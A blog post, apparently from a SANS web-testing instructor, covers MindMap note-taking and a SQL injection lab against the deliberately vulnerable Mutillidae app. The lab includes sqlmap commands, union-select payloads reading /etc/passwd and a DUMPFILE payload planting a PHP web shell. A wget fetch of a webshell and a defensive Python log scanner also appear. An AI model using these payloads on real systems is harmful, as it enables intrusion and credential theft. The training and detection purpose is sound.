Errata from my SANS SEC542 Class

This post is just a follow-up for things I spoke about during the SANS Rocky Mountain conference held in Denver, CO in June 2014…well…now.

MindMaps for Note-taking

As I mentioned in class, one way that I like to organize information during testing and just when taking notes, is in a MindMap format. There are some gorgeous “infographic-type” MindMaps like the ones on Amanhardikar’s site. I’m not talking about those. I’m talking about the notes I take during a test. Another good example of the power of using MindMap is th3j35t3r’s picture of his exploits.
MindMaps work for me because:
  1. Some good MindMap software is free. I currently use XMind but have also used FreeMind.
  2. They are multi-user so multiple testers can add/edit data in them at the same time.
  3. They allow me to note what I’m working on. Then, inevitably, when I see the testing equivalent of a “squirrel” like possible SQL injection or some other juicy item, I can easily note it to come back to and continue with my current testing. I usually use some of the MindMap icons (see the screenshots below) to note something I want to come back to (I use a question mark for that), a finding (using an exclamation mark) and other things. Come up with your own system that makes sense for you.
  4. Copying a node will give you an outline of the child nodes. So I can copy from my MindMap and paste into an Office document such as Word or Outlook and the formatting is maintained.
  5. The nodes expand and compress. So, let’s say I’ve been working on exploiting the system http://www.example.com and I’ve made a ton of entries under that system. Now I’ve finished with my testing and I need to move on to the next host (ecommerce.example.com) that is my target. In a normal text file, all of that content I’ve noted stays there in the page. I either need to put the newer stuff before or after it. I’ll still need to scroll through that old content and that’s annoying. With a MindMap, I can just contract the http://www.example.com node and all the notes “under it” collapse into the node. Need to look at those notes? Click the node and it expands. Check out the sample below. 
    Sample MindMap
  6. I can template common testing tactics/processes to ensure that they are done on each assessment. In the template I show sample testing notes for a few systems too. An extract is below.
    MindMap Template
I’ve posted a sample/template MindMap on my Google Drive. It is in an XMind format. Feel free to download and modify.

Pwnwiki.io

Instead of reposting a blog entry about this, I’ll point you to http://webbreacher.blogspot.com/2013/10/what-do-you-do-when-you-have-shell.html and http://pwnwiki.io.

SANS @Night Presentation

I presented a SQL Injection Exploitation talk/demo. You can download/view it here http://www.slideshare.net/webbreacher/sans-night-talk-sql-injection-exploited. The main point was to show that SQL injection exploitation was simple and about MUCH more than just stealing hundreds of thousands of database records.
I used a combination of http://www.samurai-wtf.org/ and OWASP’s Mutillidae. The steps for the lab are below.

Sqlmap
  1. In a terminal window, type: sqlmap -h
  2. Put this into sqlmap: sqlmap -u "http://mutillidae/index.php?page=user-info.php&username=test&password=password&user-info-php-submit-button=View+Account+Details"
  3. Exploit using the sqlmap command above plus the switches below:
     --current-user --current-db --hostname --users --passwords --dbs
  4. Read the first 2 records of all DB tables: --dump-all --stop=2
  5. Show the output CSVs in the directories on the Desktop in the ToolOutput folder
  6. Read a file (/etc/passwd): --file-read=/etc/passwd
Manually
  1. Enter a bad username/password like micah / letmein
  2. Enter this in the username field to get ALL the records with no password: micah'union select * from accounts
  3. Enter this in the username field to read the /etc/passwd file: micah' union select null,load_file('/etc/passwd'), null, null,null
  4. Enter this in the username field (all on one line) to upload a basic PHP web shell to the system in /var/www/:
     micah' union select null,null,null,null,'<FORM METHOD="POST" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"> <?php if($_POST["cmd"]) { system($_POST["cmd"]); } ?>' INTO DUMPFILE '/var/www/cmd.php' -- 
  5. In a browser in the VM, visit http://localhost/cmd.php
  6. Play around using ls, pwd, id -a, cat /etc/passwd
  7. Launch a Python web server: python -m SimpleHTTPServer
On Samurai
  1. In cmd.php, type ifconfig
  2. Then grab a webshell from the server by typing this into the cmd.php field: wget http://[yourIP]:8000/[webshellname].php
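As the defender's counterpart to the lab above, here is an added example (my own code, not from the talk, sqlmap or Mutillidae) that scans web server access logs for the union select, load_file and INTO DUMPFILE payloads used in the steps, for sqlmap's default User-Agent, and for any PHP script other than Mutillidae's index.php front controller being served. The log lines are constructed to mirror the lab traffic, and the single-front-controller assumption is mine.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format entries modelled on the lab traffic above; not logs from the post.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2014:10:01:02 -0600] "GET /index.php?page=user-info.php&username=test&password=password&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Jun/2014:10:02:15 -0600] "GET /index.php?page=user-info.php&username=micah%27+union+select+*+from+accounts&password=x HTTP/1.1" 200 9811 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Jun/2014:10:03:40 -0600] "GET /index.php?page=user-info.php&username=micah%27+union+select+null%2Cload_file%28%27%2Fetc%2Fpasswd%27%29%2Cnull%2Cnull%2Cnull&password=x HTTP/1.1" 200 7300 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Jun/2014:10:04:12 -0600] "GET /index.php?page=user-info.php&username=micah%27+union+select+null%2Cnull%2Cnull%2Cnull%2C%27x%27+into+dumpfile+%27%2Fvar%2Fwww%2Fcmd.php%27--+&password=x HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Jun/2014:10:04:50 -0600] "GET /index.php?page=user-info.php&username=test%27%20AND%201%3D1--%20&password=x HTTP/1.1" 200 5120 "-" "sqlmap/1.0 (http://sqlmap.org)"
10.0.0.5 - - [12/Jun/2014:10:05:01 -0600] "GET /cmd.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
"""

# Assumption (not on the page): Mutillidae serves every page through index.php,
# so any other .php script answering (e.g. cmd.php from the DUMPFILE step) stands out.
KNOWN_SCRIPTS = {"/index.php"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)'
    r' [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Signatures for the lab's three techniques, run against the URL-decoded request.
SQLI_PATTERNS = [
    ("union-select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I)),
    ("file-read", re.compile(r"\bload_file\s*\(", re.I)),
    ("file-write", re.compile(r"\binto\s+(dump|out)file\b", re.I)),
]

def scan_log(text):
    """Return (timestamp, ip, method, script, reasons) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip anything that is not a combined-format entry
        decoded = unquote_plus(m["path"])  # undo %27 / + so the payload is visible
        script = decoded.split("?", 1)[0]
        reasons = [name for name, rx in SQLI_PATTERNS if rx.search(decoded)]
        if "sqlmap" in m["ua"].lower():  # sqlmap's default User-Agent names itself
            reasons.append("sqlmap-ua")
        if script.endswith(".php") and script not in KNOWN_SCRIPTS:
            reasons.append("unexpected-script")
        if reasons:
            hits.append((m["ts"], m["ip"], m["method"], script, reasons))
    return hits

if __name__ == "__main__":
    for ts, ip, method, script, reasons in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {method} {script}: {', '.join(reasons)}")
```

Run against the constructed log it flags five of the six lines, leaving the ordinary account lookup alone; point it at a real access_log and adjust KNOWN_SCRIPTS to your application's entry points.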

SQL Injection Cheat Sheet Site

Time Waster
